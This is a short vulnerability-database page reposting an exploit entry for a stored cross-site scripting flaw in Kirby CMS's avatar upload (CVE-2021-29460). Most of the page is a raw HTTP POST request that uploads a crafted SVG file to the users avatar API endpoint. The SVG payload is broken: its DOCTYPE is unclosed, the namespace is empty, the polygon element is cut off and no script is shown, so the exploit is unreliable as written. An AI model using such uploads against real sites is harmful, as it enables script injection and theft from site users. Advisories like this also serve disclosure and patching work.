Friday, May 14, 2021

Kirby CMS - 'file' Cross-Site Scripting (XSS)

# Exploit Title: Kirby CMS - 'file' Cross-Site Scripting (XSS)
# Date: 21-04-2021
# Exploit Author: Sreenath Raghunathan
# Vendor Homepage:
# Software Link:
# Version:
# CVE : CVE-2021-29460

POST /api/users/<userid>/avatar HTTP/1.1
Host: <host>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF: <redacted>
Content-Type: multipart/form-data;
Content-Length: 563

Connection: close

Content-Disposition: form-data; name="file"; filename="svgxss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"

<svg version="1.1" baseProfile="full" xmlns="">
  <polygon id="triangle" points="0,0 0,500 500,0" fill="#009900"

Copyright © 2020 Cyber Details - Vulnerability Database™

Thanks for everything Templateism - You should have written the code a little more complicated